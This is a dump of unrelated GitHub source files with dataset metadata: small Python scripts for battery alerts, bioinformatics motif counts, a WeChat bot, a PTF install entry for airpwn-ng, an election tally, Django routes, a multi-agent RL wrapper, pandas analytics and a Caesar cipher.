battery remaining info\r\nswitch = 1\r\nwhile(switch):\r\n battery = psutil.sensors_battery()\r\n percent = battery.percent\r\n # time_left = battery.secsleft #seconds left\r\n is_charging = battery.power_plugged\r\n\r\n if( (is_charging) & (percent > 97) ):\r\n while((is_charging) & (percent > 97)):\r\n notification.notify(\r\n title = \"Battery Full!!!\",\r\n message = f\"Percentage = {str(percent)}%. 
UNPLUG!\",\r\n timeout=30,\r\n )\r\n time.sleep(10)\r\n \r\n #new object instance\r\n battery = psutil.sensors_battery()\r\n is_charging = battery.power_plugged\r\n if(is_charging == False):\r\n break\r\n elif(is_charging):\r\n notification.notify(\r\n title = \"Battery Charging!\",\r\n message = f\"Battery Currently at - {str(percent)}%\",\r\n timeout=10,\r\n )\r\n else:\r\n notification.notify(\r\n title = \"Battery In Use.\",\r\n message = f\"Battery Remaining - {str(percent)}%\",\r\n timeout=10,\r\n )\r\n \r\n\r\n #program repeats execution after every (min * 60mins)\r\n time.sleep(15*60)\r\n\r\n\r\n #continue to restart loop\r\n continue","repo_name":"snndmaa/Battery-Health-Regualtor","sub_path":"battery_info.py","file_name":"battery_info.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40251755168","text":"'''\nhttps://leetcode-cn.com/problems/gray-code\n\n格雷编码是一个二进制数字系统,在该系统中,两个连续的数值仅有一个位数的差异。\n给定一个代表编码总位数的非负整数 n,打印其格雷编码序列。格雷编码序列必须以 0 开头。\n示例 1:\n输入: 2\n输出: [0,1,3,2]\n解释:\n00 - 0\n01 - 1\n11 - 3\n10 - 2\n\n对于给定的 n,其格雷编码序列并不唯一。\n例如,[0,2,3,1] 也是一个有效的格雷编码序列。\n\n00 - 0\n10 - 2\n11 - 3\n01 - 1\n示例 2:\n输入: 0\n输出: [0]\n解释: 我们定义格雷编码序列必须以 0 开头。\n 给定编码总位数为 n 的格雷编码序列,其长度为 2n。当 n = 0 时,长度为 20 = 1。\n 因此,当 n = 0 时,其格雷编码序列为 [0]。\n'''\n\nclass Solution:\n def grayCode(self, n):\n \"\"\"\n :type n: int\n :rtype: List[int]\n \"\"\"\n \n\n\nif __name__ == '__main__':\n s = Solution()\n # ret = s.\n print(s)\n","repo_name":"chanfengsr/AllPrivateProject","sub_path":"Python/LeetCodeTraining/题库/0089 格雷编码(Gray Code).py","file_name":"0089 格雷编码(Gray Code).py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"zh","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"28588410127","text":"#inputs are the motifs, a list of kmers (strings)\n#output the count matrix of motifs as a dictionary of lists\n\ndef Count(Motifs):\n count = {} #final dictionary\n rows = Motifs\n row = len(rows[0]) #6\n for symbol in \"ACGT\":\n count[symbol] = [] #4 empty lists now exist\n for nucleotide in range(row):\n count[symbol].append(0)\n #count looks like this: {'A': [0, 0, 0, 0, 0, 0], 'C': [0, 0, 0, 0, 0, 0], 'G': [0, 0, 0, 0, 0, 0], 'T': [0, 0, 0, 0, 0, 0]}\n #added a 0 to each empty list for how many nucleotides there are in a row, 6.\n\n t = len(Motifs)\n for i in range(t): # for each kmer in Motifs\n for j in range(row): # for each element of the kmer\n symbol = Motifs[i][j] # assigns symbol to A, C, G, or T\n count[symbol][j] += 1 # adds 1 to the position in the list assigned to the key. 
when we iterate over an A, add 1 to A's count.\n # print(symbol, count[symbol][j])\n return count\n\nprint(Count([\n \"AACGTG\",\n \"GTGCAC\",\n \"GTGCGT\",\n \"CACGTG\",\n \"CCCGGT\"\n]))\n\n\n#Write a function such that\n# Input: A list of kmers Motifs\n# Output: the profile matrix of Motifs, as a dictionary of lists.\n\ndef Profile(Motifs):\n profile = {} #final dictionary\n profile = Count(Motifs) #subroutine\n\n #{'A': [1, 2, 0, 0, 1, 0], 'C': [2, 1, 3, 2, 0, 1], 'G': [2, 0, 2, 3, 2, 2], 'T': [0, 2, 0, 0, 2, 2]}\n\n\n t = len(Motifs) #5, how many strings in the motifs list\n k = len(Motifs[0]) #6, how many characters/nucelotides in each row\n\n for i in profile:\n for j in range(k):\n profile[i][j] = profile[i][j]/t\n\n return profile\n\nprint(Profile([\n \"AACGTG\",\n \"GTGCAC\",\n \"GTGCGT\",\n \"CACGTG\",\n \"CCCGGT\"\n]))\n","repo_name":"amkera/python_for_bioinformatics","sub_path":"count_motifs.py","file_name":"count_motifs.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29282545842","text":"#coding=utf8\nimport itchat, time, tuling\nfrom itchat.content import *\n\n@itchat.msg_register([TEXT])\ndef text_reply(msg):\n msgContent = msg['Text']\n msg.user.send(tuling.getTulingResponse(msgContent))\n #return itchat.send(getTulingRes(msg))\n\n@itchat.msg_register(FRIENDS)\ndef add_friend(msg):\n msg.user.verify()\n msg.user.send('很高兴认识你!')\n\n@itchat.msg_register(TEXT, isGroupChat=True)\ndef text_reply(msg):\n if msg['isAt']:\n msgContent = msg['Text']\n itchat.send(tuling.getTulingResponse(msgContent))\n\nitchat.auto_login()\nitchat.run()\n\n","repo_name":"LongQi/xiaoni","sub_path":"xiaoni.py","file_name":"xiaoni.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29335681419","text":"#Conversión de Decimal a Binario\nNumber = int(input(\"adjunte un número decimal: \")) \n\nlista = [] \n\nwhile Number>0: \n\n resto = int(Number%2) \n\n lista.append(resto) \n\n Number = (Number-resto)/2 \n\nNumber_bin = \"\" \n\nfor e in lista[::-1]: \n\n Number_bin = Number_bin + str(e) \n\nprint(\"resultado=\"+str(Number_bin))\n","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej4/hito1_ej4_5d47c448ccd119641a03cb2e204eb67a.py","file_name":"hito1_ej4_5d47c448ccd119641a03cb2e204eb67a.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43731950785","text":"#!/usr/bin/env python\n#####################################\n# Installation module for airpwn-ng\n#####################################\n\n# AUTHOR OF MODULE NAME\nAUTHOR=\"Joao Pena Gil (Jack64)\"\n\n# DESCRIPTION OF THE MODULE\nDESCRIPTION=\"This module will install/update airpwn-ng, a tool for 802.11 packet injection & cookie grabbing\"\n\n# INSTALL TYPE GIT, SVN, FILE DOWNLOAD\n# OPTIONS = GIT, SVN, FILE\nINSTALL_TYPE=\"GIT\"\n\n# LOCATION OF THE FILE OR GIT/SVN REPOSITORY\nREPOSITORY_LOCATION=\"https://github.com/ICSec/airpwn-ng\"\n\n# WHERE DO YOU WANT TO INSTALL IT\nINSTALL_LOCATION=\"airpwn-ng\"\n\n# DEPENDS FOR DEBIAN INSTALLS\nDEBIAN=\"python-scapy\"\n\n# DEPENDS FOR FEDORA INSTALLS\nFEDORA=\"\"\n\n# COMMANDS TO RUN 
 +{"seq_id":"43731950785","text":"#!/usr/bin/env python\n#####################################\n# Installation module for airpwn-ng\n#####################################\n\n# AUTHOR OF MODULE NAME\nAUTHOR=\"Joao Pena Gil (Jack64)\"\n\n# DESCRIPTION OF THE MODULE\nDESCRIPTION=\"This module will install/update airpwn-ng, a tool for 802.11 packet injection & cookie grabbing\"\n\n# INSTALL TYPE GIT, SVN, FILE DOWNLOAD\n# OPTIONS = GIT, SVN, FILE\nINSTALL_TYPE=\"GIT\"\n\n# LOCATION OF THE FILE OR GIT/SVN REPOSITORY\nREPOSITORY_LOCATION=\"https://github.com/ICSec/airpwn-ng\"\n\n# WHERE DO YOU WANT TO INSTALL IT\nINSTALL_LOCATION=\"airpwn-ng\"\n\n# DEPENDS FOR DEBIAN INSTALLS\nDEBIAN=\"python-scapy\"\n\n# DEPENDS FOR FEDORA INSTALLS\nFEDORA=\"\"\n\n# COMMANDS TO RUN AFTER\nAFTER_COMMANDS=\"\"\n\nLAUNCHER=\"airpwn-ng\"\n","repo_name":"trustedsec/ptf","sub_path":"modules/wireless/airpwnng.py","file_name":"airpwnng.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":4859,"dataset":"github-code","pt":"77"} +{"seq_id":"12375486966","text":"'''\n    The results of the latest elections to the government of town X were the following:\n    District      Candidate   Candidate   Candidate   Candidate\n                      A           B           C           D\n    12.1             194          48         206          45\n    13.2             180          20         320          16\n    14.3             221          90         140          20\n    15.4             432          50         821          14\n    16.5             820          61         946          18\n    Write a program that performs the following tasks:\n    - Print the table above, headers included.\n    - Compute and print the total number of votes received by each candidate and the\n    percentage of the total votes cast. Also display the most voted candidate.\n    - If any candidate receives more than 50 percent of the votes, the program prints\n    a message declaring them the winner.\n    - If no candidate receives more than 50 percent of the votes, the program must\n    print the names of the two most voted candidates, who will advance to\n    the second round of the elections\n'''\n\nmatriz = [['District', 'Candidate', 'Candidate', 'Candidate', 'Candidate'],\n          [' ', 'A', 'B', 'C', 'D'],\n          [12.1, 194, 48, 206, 45],\n          [13.2, 180, 20, 320, 16],\n          [14.3, 221, 90, 140, 20],\n          [15.4, 432, 50, 821, 13],\n          [16.5, 820, 61, 946, 18]]\n\nprint(matriz)\n\nx = 2\ny = 1\ncandidato_a = 0\ncandidato_b = 0\ncandidato_c = 0\ncandidato_d = 0\n# every loop must start at row 2, the first data row (the original started at\n# 3, 4 and 5, skipping districts and undercounting candidates B, C and D)\nfor x in range(2, len(matriz)):\n    if y == 1:\n        candidato_a += matriz[x][y]\n\ny += 1\n\nfor x in range(2, len(matriz)):\n    if y == 2:\n        candidato_b += matriz[x][y]\n\ny += 1\n\nfor x in range(2, len(matriz)):\n    if y == 3:\n        candidato_c += matriz[x][y]\n\ny += 1\n\nfor x in range(2, len(matriz)):\n    if y == 4:\n        candidato_d += matriz[x][y]\n\ntotal = candidato_a + candidato_b + candidato_c + candidato_d\n\nprint(candidato_a)\n\nporcentaje_a = (candidato_a * 100) / total\nporcentaje_b = (candidato_b * 100) / total\nporcentaje_c = (candidato_c * 100) / total\nporcentaje_d = (candidato_d * 100) / total\n\nprint(f'The vote percentages per candidate are: A = {porcentaje_a}%, B = {porcentaje_b}%, C = {porcentaje_c}%, D = {porcentaje_d}%')\n\nif candidato_a > candidato_b and candidato_a > candidato_c and candidato_a > candidato_d:\n    print(f'The most voted candidate was candidate A with {candidato_a}')\nelif candidato_b > candidato_a and candidato_b > candidato_c and candidato_b > candidato_d:\n    print(f'The most voted candidate was candidate B with {candidato_b}')\nelif candidato_c > candidato_a and candidato_c > candidato_b and candidato_c > candidato_d:\n    print(f'The most voted candidate was candidate C with {candidato_c}')\nelif candidato_d > candidato_a and candidato_d > candidato_b and candidato_d > candidato_c:\n    print(f'The most voted candidate was candidate D with {candidato_d}')\n\nif porcentaje_a > 50:\n    print('Candidate A wins outright!!!')\nelif porcentaje_b > 50:\n    print('Candidate B wins outright!!!')\nelif porcentaje_c > 50:\n    print('Candidate C wins outright!!!')\nelif porcentaje_d > 50:\n    print('Candidate D wins outright!!!')\nelse:\n    print('Nobody won an outright majority!')\n    \n\ncandidatos_vector = [candidato_a, candidato_b, candidato_c, candidato_d]\ncandidatos_mayores = [candidatos_vector[2], candidatos_vector[3]]\n\n
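# [Editor's aside, illustrative only; 'top_two_builtin' is not in the original
# program] Python's built-in sorted() yields the same two highest totals as the
# hand-written bubble sort that follows:
top_two_builtin = sorted(candidatos_vector)[-2:]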
for i in range(1, len(candidatos_vector)):\n    for j in range(0, len(candidatos_vector) - i):\n        if (candidatos_vector[j + 1] < candidatos_vector[j]):\n            aux = candidatos_vector[j]\n            candidatos_vector[j] = candidatos_vector[j+1]\n            candidatos_vector[j+1] = aux\n\nprint('The following candidates advance to the next round:')\nif candidatos_vector[2] == candidato_a:\n    print('Candidate A')\n\nif candidatos_vector[2] == candidato_b:\n    print('Candidate B')\n\nif candidatos_vector[2] == candidato_c:\n    print('Candidate C')\n\nif candidatos_vector[2] == candidato_d:\n    print('Candidate D')\n\nif candidatos_vector[3] == candidato_a:\n    print('Candidate A')\n\nif candidatos_vector[3] == candidato_b:\n    print('Candidate B')\n\nif candidatos_vector[3] == candidato_c:\n    print('Candidate C')\n\nif candidatos_vector[3] == candidato_d:\n    print('Candidate D')","repo_name":"LucasLeone/tp4-algoritmos","sub_path":"m11.py","file_name":"m11.py","file_ext":"py","file_size_in_byte":4321,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11697130723","text":"import sys\nimport time\nimport Herm_Char\nplayer = Herm_Char.char = {\"lvl\" : 1,\n                           \"xp\" : 0,\n                           \"lvlnxt\" : 25}\nclass Ability():\n    def level(self):\n        nStr = 0\n        nDex = 0\n        nInt = 0\n        while player[\"xp\"] >= player[\"lvlnxt\"]:\n            player[\"lvl\"] += 1\n            player[\"xp\"] = player[\"xp\"] - player[\"lvlnxt\"]\n            player[\"lvlnxt\"] = round(player[\"lvlnxt\"] * 1.5)\n            for i in \"\"\"What SKILL would you like to increase???\nIntellect(I)\nStrength(S)\nDexterity(D)\n\"\"\":\n                sys.stdout.write(i)\n                sys.stdout.flush()\n                time.sleep(.05)\n            skill_point = input(\"\").lower()\n            if skill_point == \"i\":\n                nInt += 1\n            elif skill_point == \"s\":\n                nStr += 1\n            elif skill_point == \"d\":\n                nDex += 1","repo_name":"KhajiitChief/Hello_World_Game","sub_path":"Skills.py","file_name":"Skills.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20794051737","text":"from django.urls import path\nfrom . 
import views\n\napp_name = 'basic_app'\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('relative/', views.relative, name='relative'),\n path('other/', views.other, name='other'),\n path('registration/', views.registration, name='registration'),\n path('login/', views.user_login, name='login'),\n path('logout/', views.user_logout, name='logout'),\n\n]","repo_name":"andrewtmarvin/django-deployment-example","sub_path":"learning_templates/basic_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12458965621","text":"import numpy as np\r\n\r\nfrom tensorflow.keras.layers import Concatenate\r\nfrom os.path import splitext\r\nfrom simagent.twoagentsagent import TwoAgentsAgent\r\n\r\nclass SimultaneousAgent(TwoAgentsAgent):\r\n def __init__(self, agents):\r\n self.agents = agents\r\n self.n = len(agents)\r\n self.compiled = False\r\n self.m_names = []\r\n self._training = False\r\n self._step = 0\r\n self.agents_combinations = []\r\n self.current_fight_number = -1\r\n self.current_fight = []\r\n self.player = 0\r\n self.player_one = 0\r\n self.game_step = 0\r\n super(SimultaneousAgent, self).__init__()\r\n\r\n self.current_game_number = -1 # Used to append steps to proper games.\r\n self.current_game = [], []\r\n self.agents_games_log = []\r\n\r\n # Creating list with proper structure.\r\n for i in range(self.n):\r\n self.agents_games_log.append([])\r\n\r\n # Creating list with proper structure.\r\n for i in range(self.n):\r\n case = []\r\n for j in range(self.n):\r\n case.append([])\r\n self.rewards_history.append(case)\r\n\r\n @property\r\n def training(self):\r\n return self._training\r\n\r\n @training.setter\r\n def training(self,t):\r\n self._training = t\r\n for agent in self.agents:\r\n agent.training = t\r\n\r\n @property\r\n def step(self):\r\n return self._step\r\n\r\n @step.setter\r\n def step(self,s):\r\n self._step = s\r\n for agent in self.agents:\r\n agent.step = s\r\n\r\n def reset_states(self):\r\n for agent in self.agents:\r\n agent.reset_states()\r\n\r\n def forward(self, observation):\r\n \"\"\"Takes the an observation from the environment and returns the action to be taken next.\r\n If the policy is implemented by a neural network, this corresponds to a forward (inference) pass.\r\n # Argument\r\n observation (object): The current observation from the environment.\r\n # Returns\r\n The next action to be executed in the environment.\r\n \"\"\"\r\n self.game_step = observation[2]\r\n if self.game_step == -1:\r\n if self.current_fight_number == len(self.agents_combinations)-1:\r\n self.current_fight_number = -1\r\n self.current_fight_number += 1\r\n\r\n # Print number of the pair playing right now / total number of pairs.\r\n # print(self.current_fight_number, \"/\", len(self.agents_combinations)-1)\r\n self.current_fight = self.agents_combinations[self.current_fight_number]\r\n self.player = self.current_fight[0]\r\n self.player_one = self.current_fight[1]\r\n\r\n ## print(\"#### AGENTS PLAYING:\",self.player, self.player_one)\r\n self.current_game[0].append([self.player, self.player_one])\r\n self.current_game[1].append([self.player_one, self.player])\r\n\r\n if self.current_fight_number == 0:\r\n self.current_game_number += 1\r\n\r\n current_players_actions = [self.agents[self.player].forward([observation[0],\r\n self.game_step,\r\n self.player_one,\r\n observation[3][1]\r\n ]),\r\n 
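# [Editor's note] The two forward() calls above and below are symmetric: each
# agent receives its own observation slice, the current game step, the
# opponent's index, and the opponent's slot of observation[3].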
self.agents[self.player_one].forward([observation[1],\r\n self.game_step,\r\n self.player,\r\n observation[3][0]\r\n ])]\r\n\r\n if self.game_step != 19:\r\n self.current_game[0].append(current_players_actions[0])\r\n self.current_game[1].append(current_players_actions[1])\r\n\r\n return current_players_actions\r\n\r\n def backward(self, reward, terminal):\r\n \"\"\"Updates the agent after having executed the action returned by `forward`.\r\n If the policy is implemented by a neural network, this corresponds to a weight update using back-prop.\r\n # Argument\r\n reward (float): The observed reward after executing the action returned by `forward`.\r\n terminal (boolean): `True` if the new state of the environment is terminal.\r\n # Returns\r\n List of metrics values\r\n \"\"\"\r\n if self.game_step == 19:\r\n self.agents_games_log[self.player].append([self.current_game[0],\r\n self.current_game[1]])\r\n self.agents_games_log[self.player_one].append([self.current_game[1],\r\n self.current_game[0]])\r\n self.current_game = [], []\r\n\r\n return [self.agents[self.player].backward(reward[0], terminal),\r\n self.agents[self.player_one].backward(reward[1], terminal)]\r\n\r\n def compile(self, optimizer, metrics=[]):\r\n \"\"\"Compiles an agent and the underlaying models to be used for training and testing.\r\n # Arguments\r\n optimizer (`keras.optimizers.Optimizer` instance): The optimizer to be used during training.\r\n metrics (list of functions `lambda y_true, y_pred: metric`): The metrics to run during training.\r\n \"\"\"\r\n # Set optimizer and metrics (plus other 'compile' things) for each agent.\r\n for i,agent in enumerate(self.agents):\r\n if not agent.compiled:\r\n agent.compile(optimizer[i],metrics[i])\r\n\r\n # Create agents combinations.\r\n combinations = []\r\n for i in range(len(self.agents)):\r\n for j in range(len(self.agents)):\r\n if i != j:\r\n combinations.append([i,j])\r\n\r\n for i in range(len(combinations)):\r\n combinations[i].sort()\r\n combinations.sort()\r\n\r\n for i in range(len(combinations)):\r\n if i % 2 == 0:\r\n self.agents_combinations.append(combinations[i])\r\n\r\n # Add each agent's metrics names to self.m_names.\r\n for i in range(len(self.agents)):\r\n self.m_names.append(self.agents[i].metrics_names)\r\n\r\n self.compiled = True\r\n\r\n def load_weights(self, filepath):\r\n \"\"\"Loads the weights of an agent from an HDF5 file.\r\n # Arguments\r\n filepath (str): The path to the HDF5 file.\r\n \"\"\"\r\n fbase, fext = splitext(filepath)\r\n for i, agent in enumerate(self.agents):\r\n if i <= 1:\r\n agent.load_weights('%s%i%s' % (fbase,i,fext))\r\n\r\n def save_weights(self, filepath, overwrite=False):\r\n \"\"\"Saves the weights of an agent as an HDF5 file.\r\n # Arguments\r\n filepath (str): The path to where the weights should be saved.\r\n overwrite (boolean): If `False` and `filepath` already exists, raises an error.\r\n \"\"\"\r\n fbase, fext = splitext(filepath)\r\n for i, agent in enumerate(self.agents):\r\n if i <= 1:\r\n agent.save_weights('%s%i%s' % (fbase,i,fext), overwrite)\r\n\r\n @property\r\n def layers(self):\r\n \"\"\"Returns all layers of the underlying model(s).\r\n If the concrete implementation uses multiple internal models,\r\n this method returns them in a concatenated list.\r\n # Returns\r\n A list of the model's layers\r\n \"\"\"\r\n return [ layer for agent in self.agents\r\n for layer in agent.layers() ]\r\n\r\n @property\r\n def metrics_names(self):\r\n \"\"\"The human-readable names of the agent's metrics. 
Must return as many names as there\r\n are metrics (see also `compile`).\r\n # Returns\r\n A list of metric's names (string)\r\n \"\"\"\r\n return [self.m_names[0], self.m_names[1]]\r\n\r\n def _on_train_begin(self):\r\n \"\"\"Callback that is called before training begins.\"\r\n \"\"\"\r\n for agent in self.agents:\r\n agent._on_train_begin()\r\n\r\n def _on_train_end(self):\r\n \"\"\"Callback that is called after training ends.\"\r\n \"\"\"\r\n for agent in self.agents:\r\n agent._on_train_end()\r\n\r\n def _on_test_begin(self):\r\n \"\"\"Callback that is called before testing begins.\"\r\n \"\"\"\r\n for agent in self.agents:\r\n agent._on_test_begin()\r\n\r\n def _on_test_end(self):\r\n \"\"\"Callback that is called after testing ends.\"\r\n \"\"\"\r\n for agent in self.agents:\r\n agent._on_test_end()\r\n\r\n\r\n\r\n def get_agents_games_log(self):\r\n return self.agents_games_log\r\n\r\n def get_n(self):\r\n return self.n\r\n\r\n def forward_test(self, observation, player0, player1, agent_index, agent_one_index):\r\n self.player = player0\r\n self.player_one = player1\r\n self.game_step = observation[2]\r\n\r\n if self.game_step == -1:\r\n ## print(\"### HIVES PLAYING:\", self.player, self.player_one)\r\n ## print(\"### AGENTS PLAYING:\", agent_index, agent_one_index)\r\n\r\n if self.current_fight_number == 0:\r\n self.current_game_number += 1\r\n\r\n # [my_action, enemy_action, step, my_hive, enemy_hive, my_reward, my_index, enemy_index]\r\n current_players_actions = [self.agents[self.player].forward([self.game_step,\r\n observation[1],\r\n observation[0],\r\n self.player,\r\n self.player_one,\r\n observation[3][0],\r\n agent_index,\r\n agent_one_index\r\n ]),\r\n self.agents[self.player_one].forward([self.game_step,\r\n observation[0],\r\n observation[1],\r\n self.player_one,\r\n self.player,\r\n observation[3][1],\r\n agent_one_index,\r\n agent_index\r\n ])]\r\n\r\n return current_players_actions\r\n\r\n\r\n def backward_test(self, reward, terminal):\r\n \"\"\"Updates the agent after having executed the action returned by `forward`.\r\n If the policy is implemented by a neural network, this corresponds to a weight update using back-prop.\r\n # Argument\r\n reward (float): The observed reward after executing the action returned by `forward`.\r\n terminal (boolean): `True` if the new state of the environment is terminal.\r\n # Returns\r\n List of metrics values\r\n \"\"\"\r\n if self.game_step == 19:\r\n self.agents_games_log[self.player].append([self.current_game[0],\r\n self.current_game[1]])\r\n self.agents_games_log[self.player_one].append([self.current_game[1],\r\n self.current_game[0]])\r\n self.current_game = [], []\r\n\r\n return [self.agents[self.player].backward(reward[0],terminal),\r\n self.agents[self.player_one].backward(reward[1],terminal)]\r\n\r\n def get_rewards_history(self):\r\n return self.rewards_history\r\n","repo_name":"BSski/HIVE","sub_path":"simagent/simultaneous.py","file_name":"simultaneous.py","file_ext":"py","file_size_in_byte":12229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"44519606885","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*\n\"\"\"\n.. 
$Id$\n\"\"\"\n\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import absolute_import\n\nfrom datetime import date\nfrom datetime import datetime\nfrom datetime import timedelta\n\nimport pandas as pd\n\nfrom nti.analytics_pandas.queries import QueryUsers\n\nfrom nti.analytics_pandas.utils import get_values_of_series_categorical_index_\n\nlogger = __import__('logging').getLogger(__name__)\n\n\ndef first_date_of_the_week(year, week):\n ret = datetime.strptime('%04d-%02d-2' % (year, week), '%Y-%W-%w')\n if date(year, 1, 4).isoweekday() > 4:\n ret -= timedelta(days=7)\n return ret\n\n\ndef add_timestamp_period_(df, period_format=u'%Y-%m-%d', time_period='daily'):\n if 'timestamp' in df.columns:\n if time_period == 'weekly':\n df['timestamp_period'] = df['timestamp'].apply(\n lambda x: first_date_of_the_week(x.year, x.week)\n )\n else:\n df['timestamp_period'] = df['timestamp'].apply(\n lambda x: x.strftime(period_format)\n )\n return df\n\n\ndef explore_number_of_events_based_timestamp_date_(df):\n if len(df.index) > 0:\n grouped = df.groupby('timestamp_period')\n df.reset_index(inplace=True)\n events_df = grouped.aggregate(pd.Series.nunique)\n return events_df\n\n\ndef explore_unique_users_based_timestamp_date_(df):\n if len(df.index) > 0:\n grouped = df.groupby('timestamp_period')\n unique_users_per_period_df = grouped.aggregate(\n {'user_id': pd.Series.nunique}\n )\n unique_users_per_period_df.rename(columns={'user_id': 'total_unique_users'},\n inplace=True)\n return unique_users_per_period_df\n\n\ndef explore_ratio_of_events_over_unique_users_based_timestamp_date_(events_df,\n events_df_column_name,\n unique_users_df):\n if events_df is not None and unique_users_df is not None:\n merge_df = events_df.join(unique_users_df)\n merge_df['ratio'] = merge_df[events_df_column_name] / merge_df['total_unique_users']\n return merge_df\n\n\ndef analyze_types_(df, group_by_items, agg_columns=None):\n if 'device_type' in group_by_items and 'device_type' in df.columns:\n df['device_type'] = df['device_type'].astype(str)\n df['device_type'] = df['device_type'].replace('nan', 'Unknown')\n\n if 'enrollment_type' in group_by_items and 'enrollment_type' in df.columns:\n df['enrollment_type'] = df['enrollment_type'].astype(str)\n df['enrollment_type'] = df['enrollment_type'].replace('nan', 'Unknown')\n\n if len(df.index) > 0:\n check = set(group_by_items) & set(df.columns)\n if len(check) == len(group_by_items):\n grouped = df.groupby(group_by_items)\n if agg_columns is not None:\n events_df = grouped.aggregate(agg_columns)\n else:\n events_df = grouped.aggregate(pd.Series.nunique)\n return events_df\n\n\ndef get_most_active_users_(df, session, max_rank_number=10):\n if df is None or df.empty:\n return\n most_active_user_id = df.groupby('user_id').size() \\\n \t\t\t\t\t.sort_values(ascending=False)[:max_rank_number]\n most_active_user_id_df = most_active_user_id.to_frame(\n name='number_of_activities'\n )\n most_active_user_id_df.reset_index(level=0, inplace=True)\n\n users_id = get_values_of_series_categorical_index_(\n most_active_user_id\n ).tolist()\n\n most_active_user_df = QueryUsers(session).get_username_filter_by_user_id(users_id)\n most_active_user_df = most_active_user_df.merge(most_active_user_id_df)\n\n most_active_user_df.sort_values(by='number_of_activities',\n\t\t\t\t\t\t\t\t\tascending=[0],\n\t\t\t\t\t\t\t\t\tinplace=True)\n most_active_user_df.reset_index(inplace=True, drop=True)\n return most_active_user_df\n\n\ndef generate_pivot_table_(df, 
index_columns, values_columns, agg_funcs):\n    table = pd.pivot_table(df,\n                           index=index_columns,\n                           values=values_columns,\n                           aggfunc=agg_funcs, fill_value=0)\n    return table\n\n\ndef reset_dataframe_(df):\n    df.reset_index(inplace=True)\n    df['timestamp_period'] = pd.to_datetime(df['timestamp_period'])\n    return df\n\n\ndef get_data(table,\n             with_context_name=True,\n             with_device_type=True,\n             with_enrollment_type=True):\n    data = {}\n    if not table.dataframe.empty:\n        df_by_timestamp = table.analyze_events()\n        df_by_timestamp = reset_dataframe_(df_by_timestamp)\n        data['df_by_timestamp'] = df_by_timestamp\n        if with_context_name:\n            df_per_course_sections = table.analyze_events_per_course_sections()\n            df_per_course_sections = reset_dataframe_(df_per_course_sections)\n            data['df_per_course_sections'] = df_per_course_sections\n        if with_device_type and 'device_type' in table.dataframe.columns:\n            if hasattr(table, 'analyze_events_per_device_types'):\n                df_per_device_types = table.analyze_events_per_device_types()\n            else:\n                df_per_device_types = table.analyze_device_types()\n            df_per_device_types = reset_dataframe_(df_per_device_types)\n            data['df_per_device_types'] = df_per_device_types\n        if with_enrollment_type and 'enrollment_type' in table.dataframe.columns:\n            if hasattr(table, 'analyze_events_per_enrollment_types'):\n                df_per_enrollment_type = table.analyze_events_per_enrollment_types()\n            else:\n                df_per_enrollment_type = table.analyze_enrollment_types()\n            df_per_enrollment_type = reset_dataframe_(df_per_enrollment_type)\n            data['df_per_enrollment_type'] = df_per_enrollment_type\n    return data\n","repo_name":"OpenNTI/nti.analytics_pandas","sub_path":"src/nti/analytics_pandas/analysis/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":5956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"8195767657","text":"\ndef roman_to_int(input):\n    if type(input) != type(\"\"):\n        raise TypeError(\"expected string, got %s\" % type(input))\n    input = input.upper()\n    nums = ['M', 'D', 'C', 'L', 'X', 'V', 'I']\n    ints = [1000, 500, 100, 50, 10, 5, 1]\n    places = []\n    for c in input:\n        if not c in nums:\n            raise ValueError(\"input is not a valid roman numeral: %s\" % input)\n    for i in range(len(input)):\n        c = input[i]\n        value = ints[nums.index(c)]\n        # If the next place holds a larger number, this value is negative.\n        try:\n            nextvalue = ints[nums.index(input[i +1])]\n            if nextvalue > value:\n                value *= -1\n        except IndexError:\n            # there is no next place.\n            pass\n        places.append(value)\n    return sum(places)\n","repo_name":"perrymant/CodeWarsKataStuff","sub_path":"CodeWarsKataStuff/Roman to int.py","file_name":"Roman to int.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21954332177","text":"import socket\r\n\r\ndef encrypt(text,s):\r\n    result = \"\"\r\n    # traverse the plain text\r\n    for i in range(len(text)):\r\n        char = text[i]\r\n        # Encrypt uppercase characters in plain text\r\n        if (char.isupper()):\r\n            result += chr((ord(char) + s-65) % 26 + 65)\r\n        # Encrypt lowercase characters in plain text\r\n        elif (char.islower()):\r\n            result += chr((ord(char) + s - 97) % 26 + 97)\r\n        # Leave digits, spaces and punctuation unchanged (the original sent\r\n        # every non-uppercase character through the lowercase branch)\r\n        else:\r\n            result += char\r\n    return result\r\n#check the above function
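# [Editor's illustrative check, not in the original script] With the
# non-letter pass-through added above, shifting by s and then by 26 - s
# round-trips the message:
assert encrypt(encrypt("Attack at dawn", 3), 23) == "Attack at dawn"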
